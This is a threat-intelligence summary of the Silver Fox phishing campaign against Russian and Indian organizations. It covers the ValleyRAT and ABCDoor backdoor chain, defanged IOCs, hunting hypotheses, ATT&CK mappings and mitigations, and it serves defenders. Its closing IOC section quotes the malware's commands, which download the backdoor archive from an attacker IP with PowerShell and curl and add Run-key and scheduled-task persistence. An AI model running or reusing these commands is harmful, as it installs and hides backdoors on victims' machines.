Silver Fox uses the new ABCDoor backdoor to target organizations in Russia and India
The Silver Fox threat group is conducting a phishing campaign targeting organizations in Russia and India with tax-themed lures. The attack chain utilizes a modified RustSL loader featuring geofencing and Phantom Persistence to deploy ValleyRAT. ValleyRAT subsequently downloads a novel Python-based backdoor called ABCDoor, which masquerades as a Tailscale VPN client and provides remote control and screen broadcasting capabilities.
Authors: Anton Kargin
Source:Kaspersky
- domainabc[.]3mkorealtd[.]comABCDoor C2 domain
- domainabc[.]doublemobile[.]comABCDoor C2 domain
- domainabc[.]fetish-friends[.]comCommand and Control (C2) domain for the ABCDoor backdoor.
- domainabc[.]haijing88[.]comDomain used to host malicious archives linked in phishing PDFs.
- domainabc[.]ilptour[.]comABCDoor C2 domain
- domainabc[.]petitechanson[.]comABCDoor C2 domain
- domainabc[.]sudsmama[.]comABCDoor C2 domain
- domainabc[.]woopami[.]comABCDoor C2 domain
- domainmcagov[.]ccABCDoor loader C2 domain
- domainroldco[.]comABCDoor loader C2 domain
- domainvnc[.]kcii2[.]comC2 domain for malicious remote control utilities
- ip108[.]187[.]37[.]85ValleyRAT C2 IP address
- ip108[.]187[.]41[.]221Malicious IP address associated with Silver Fox infrastructure
- ip108[.]187[.]42[.]63ValleyRAT C2 IP address
- ip139[.]180[.]128[.]251Malicious IP address associated with Silver Fox infrastructure
- ip154[.]82[.]81[.]192Malicious IP address associated with Silver Fox infrastructure
- ip154[.]82[.]81[.]205Server hosting the ABCDoor Python backdoor payload archive.
- ip192[.]163[.]167[.]14Malicious IP address associated with Silver Fox infrastructure
- ip192[.]229[.]115[.]229Malicious IP address associated with Silver Fox infrastructure
- ip192[.]238[.]205[.]47Malicious IP address associated with Silver Fox infrastructure
- ip207[.]56[.]119[.]216Malicious IP address associated with Silver Fox infrastructure
- ip207[.]56[.]138[.]28Command and Control (C2) server for the ValleyRAT backdoor.
- ip45[.]192[.]219[.]60Malicious IP address associated with Silver Fox infrastructure
- ip45[.]32[.]108[.]178Malicious IP address associated with Silver Fox infrastructure
- ip57[.]133[.]212[.]106Malicious IP address associated with Silver Fox infrastructure
- md5039e93b98ef5e329f8666a424237ae73Silver Fox RustSL loader
- md513669b8f2bd0af53a3fe9ac0490499e5ABCDoor .pyd core module
- md52b92e125184469a0c3740abcaa10350cSFX archive containing ABCDoor JavaScript loader (BillReceipt.exe)
- md54a5195a38a458cdd2c1b5ab13af3b393ValleyRAT plugin used to install ABCDoor
- md55b998a5bc5ad1c550564294034d4a62cABCDoor .pyd core module (early version)
- registry_keyHKCU:\Software\Microsoft\Windows\CurrentVersion\Run:AppClientRegistry Run key used by ABCDoor for persistence.
- urlhxxp://154[.]82[.]81[.]205/YD20251001143052[.]zipURL hosting the ABCDoor Python backdoor archive
- urlhxxp://154[.]82[.]81[.]205/YN20250923193706[.]zipURL hosting the ABCDoor Python backdoor archive
- urlhxxps://abc[.]haijing88[.]com/uploads/фнс/фнс[.]zipURL hosting malicious archive linked in Russian phishing PDF
- urlhxxps://abc[.]haijing88[.]com/uploads/印度邮箱/CBDT[.]rarURL hosting malicious archive linked in Indian phishing PDF
Detection / HunterGoogle
What Happened
A cybercriminal group known as Silver Fox is sending fake tax notices to organizations in Russia and India. When victims open the attached files or links, a hidden program is installed that eventually loads a new, custom-built tool called ABCDoor. This tool allows the attackers to secretly control the infected computer and record the user's screens. Organizations should be highly suspicious of unsolicited tax-related emails and ensure their security software is up to date.
Key Takeaways
- The Silver Fox threat group is targeting Russian and Indian organizations using tax-themed phishing emails.
- Attackers utilize a modified RustSL loader featuring 'Phantom Persistence' and geofencing checks to evade analysis.
- The attack chain deploys the ValleyRAT backdoor, which subsequently downloads a novel Python-based backdoor named ABCDoor.
- ABCDoor masquerades as the legitimate Tailscale VPN client and uses ffmpeg for multi-monitor screen broadcasting.
- The threat actors use a segmented infrastructure, separating payload delivery servers from command-and-control (C2) servers.
Affected Systems
- Windows OS
Attack Chain
The attack begins with tax-themed phishing emails containing malicious PDFs or archives. Victims execute a modified RustSL loader that decrypts a shellcode payload, which in turn downloads and executes the ValleyRAT backdoor. ValleyRAT then retrieves a custom module to download the ABCDoor Python backdoor archive, extracting it to a directory masquerading as Tailscale VPN. Finally, ABCDoor establishes persistence via registry keys or scheduled tasks and connects to its C2 for remote control and screen broadcasting.
Detection Availability
- YARA Rules: No
- Sigma Rules: No
- Snort/Suricata Rules: No
- KQL Queries: No
- Splunk SPL Queries: No
- EQL Queries: No
- Other Detection Logic: Yes
- Platforms: Kaspersky Endpoint Detection and Response Expert
Kaspersky provides specific detection rules (nodejs_dist_url_amsi, access_to_ip_detection_services_from_nonbrowsers, persistence_via_environment) within their EDR Expert platform.
Detection Engineering Assessment
EDR Visibility: High — The attack involves multiple process creations (cmd, powershell, curl, pythonw), registry modifications for persistence, and file drops in AppData and ProgramData, all of which are highly visible to EDR. Network Visibility: Medium — C2 communication is HTTPS, but initial payload downloads (ZIP files) and geofencing checks to public IP APIs are visible in network telemetry. Detection Difficulty: Moderate — While the tools use custom encryption and Phantom Persistence, the reliance on standard LOLBins (curl, powershell) and noisy registry persistence makes behavioral detection feasible.
Required Log Sources
- Process Creation (Event ID 4688 / Sysmon 1)
- Registry Value Set (Sysmon 13)
- File Creation (Sysmon 11)
- Network Connection (Sysmon 3)
Hunting Hypotheses
| Hypothesis | Telemetry | ATT&CK Stage | FP Risk |
|---|---|---|---|
| Look for pythonw.exe executing with the '-m appclient' argument, indicating ABCDoor execution. | Process Creation | Execution | Low |
| Monitor for curl.exe or powershell.exe downloading ZIP archives to the AppData directory. | Process Creation, Command Line | Command and Control | Medium |
| Detect non-browser processes (like unknown executables or pythonw.exe) making outbound connections to IP geolocation services (e.g., ipinfo.io, ip-api.com). | Network Connections, DNS Queries | Discovery | Medium |
| Identify modifications to the HKCU\Environment\UserInitMprLogonScript registry key, a known persistence mechanism used by the JS loader. | Registry Modifications | Persistence | Low |
Control Gaps
- Email security gateways failing to inspect links within attached PDFs
Key Behavioral Indicators
- pythonw.exe running from C:\ProgramData\Tailscale\python\
- Creation of %LOCALAPPDATA%\applogs\device.log
- schtasks creating a task named 'AppClient'
False Positive Assessment
- Low. The specific combination of pythonw.exe executing the 'appclient' module, masquerading as Tailscale in ProgramData, and the specific registry keys (CarEmu) are highly unique to this threat.
Recommendations
Immediate Mitigation
- Block known C2 IP addresses and domains associated with ABCDoor and ValleyRAT.
- Search endpoint telemetry for the presence of 'appclient' in command lines or scheduled tasks.
Infrastructure Hardening
- Restrict the execution of pythonw.exe from non-standard directories like ProgramData or AppData.
- Implement strict email filtering rules to quarantine PDFs containing suspicious external links.
User Protection
- Deploy EDR solutions configured to monitor for suspicious child processes spawned by PDF readers or Office applications.
- Disable or restrict the use of curl.exe and powershell.exe for standard users.
Security Awareness
- Train employees to recognize tax-themed phishing lures and verify the sender's address.
- Instruct users not to click on links within unsolicited PDF documents.
MITRE ATT&CK Mapping
- T1566.001 - Phishing: Spearphishing Attachment
- T1566.002 - Phishing: Spearphishing Link
- T1059.001 - Command and Scripting Interpreter: PowerShell
- T1059.003 - Command and Scripting Interpreter: Windows Command Shell
- T1059.006 - Command and Scripting Interpreter: Python
- T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
- T1053.005 - Scheduled Task/Job: Scheduled Task
- T1036.005 - Masquerading: Match Legitimate Name or Location
- T1113 - Screen Capture
- T1614.001 - System Location Discovery: System Language Discovery
- T1105 - Ingress Tool Transfer
Additional IOCs
- Ips:
108[.]187[.]37[[.]]85- ValleyRAT C2 IP address108[.]187[.]42[[.]]63- ValleyRAT C2 IP address108[.]187[.]41[[.]]221- Malicious IP address associated with Silver Fox infrastructure154[.]82[.]81[[.]]192- Malicious IP address associated with Silver Fox infrastructure139[.]180[.]128[[.]]251- Malicious IP address associated with Silver Fox infrastructure192[.]229[.]115[[.]]229- Malicious IP address associated with Silver Fox infrastructure207[.]56[.]119[[.]]216- Malicious IP address associated with Silver Fox infrastructure192[.]163[.]167[[.]]14- Malicious IP address associated with Silver Fox infrastructure45[.]192[.]219[[.]]60- Malicious IP address associated with Silver Fox infrastructure192[.]238[.]205[[.]]47- Malicious IP address associated with Silver Fox infrastructure45[.]32[.]108[[.]]178- Malicious IP address associated with Silver Fox infrastructure57[.]133[.]212[[.]]106- Malicious IP address associated with Silver Fox infrastructure
- Domains:
abc[.]3mkorealtd[[.]]com- ABCDoor C2 domainabc[.]sudsmama[[.]]com- ABCDoor C2 domainabc[.]woopami[[.]]com- ABCDoor C2 domainabc[.]ilptour[[.]]com- ABCDoor C2 domainabc[.]petitechanson[[.]]com- ABCDoor C2 domainabc[.]doublemobile[[.]]com- ABCDoor C2 domainmcagov[[.]]cc- ABCDoor loader C2 domainroldco[[.]]com- ABCDoor loader C2 domainvnc[.]kcii2[[.]]com- C2 domain for malicious remote control utilities
- Urls:
hxxps://abc[.]haijing88[[.]]com/uploads/фнс/фнс[.]zip- URL hosting malicious archive linked in Russian phishing PDFhxxps://abc[.]haijing88[[.]]com/uploads/印度邮箱/CBDT[.]rar- URL hosting malicious archive linked in Indian phishing PDFhxxp://154[.]82[.]81[[.]]205/YD20251001143052[.]zip- URL hosting the ABCDoor Python backdoor archivehxxp://154[.]82[.]81[[.]]205/YN20250923193706[.]zip- URL hosting the ABCDoor Python backdoor archive
- File Hashes:
13669B8F2BD0AF53A3FE9AC0490499E5(MD5) - ABCDoor .pyd core module5B998A5BC5AD1C550564294034D4A62C(MD5) - ABCDoor .pyd core module (early version)2B92E125184469A0C3740ABCAA10350C(MD5) - SFX archive containing ABCDoor JavaScript loader (BillReceipt.exe)039E93B98EF5E329F8666A424237AE73(MD5) - Silver Fox RustSL loader4A5195A38A458CDD2C1B5AB13AF3B393(MD5) - ValleyRAT plugin used to install ABCDoor
- Registry Keys:
HKCU:\Software\CarEmu:FirstInstallTime- Registry key used by ABCDoor to store initial installation timestampHKCU:\Software\CarEmu:InstallChannel- Registry key used by ABCDoor JS loader to store installation channelHKCU:\Environment:UserInitMprLogonScript- Registry key modified by Silver Fox payload for persistenceHKCU:\Console\IpDate- Hardcoded registry location checked upon ValleyRAT Login module startup
- File Paths:
C:\ProgramData\Tailscale- Directory used by ABCDoor to masquerade as legitimate VPN software%LOCALAPPDATA%\appclient\111.zip- Path where the downloaded ABCDoor archive is saved%LOCALAPPDATA%\applogs\device.log- File created by ABCDoor to store the victim's ID%LOCALAPPDATA%\applogs\exception_logs.zip- Archive created by ABCDoor to log exceptions
- Command Lines:
- Purpose: Download ABCDoor archive via PowerShell | Tools:
powershell.exe| Stage: Execution |Invoke-WebRequest -Uri 'hxxp://154.82.81[.]205/YD20251001143052.zip' -OutFile - Purpose: Download ABCDoor archive via curl | Tools:
curl.exe| Stage: Execution |curl.exe -L -o "%LOCALAPPDATA%\appclient\111.zip" - Purpose: Establish ABCDoor persistence via Registry | Tools:
cmd.exe,reg.exe| Stage: Persistence |reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "AppClient" - Purpose: Establish ABCDoor persistence via Scheduled Task | Tools:
cmd.exe,schtasks.exe| Stage: Persistence |schtasks /create /sc minute /mo 1 /tn "AppClient" /tr - Purpose: Launch ABCDoor Python backdoor | Tools:
pythonw.exe| Stage: Execution |pythonw.exe -m appclient
- Purpose: Download ABCDoor archive via PowerShell | Tools: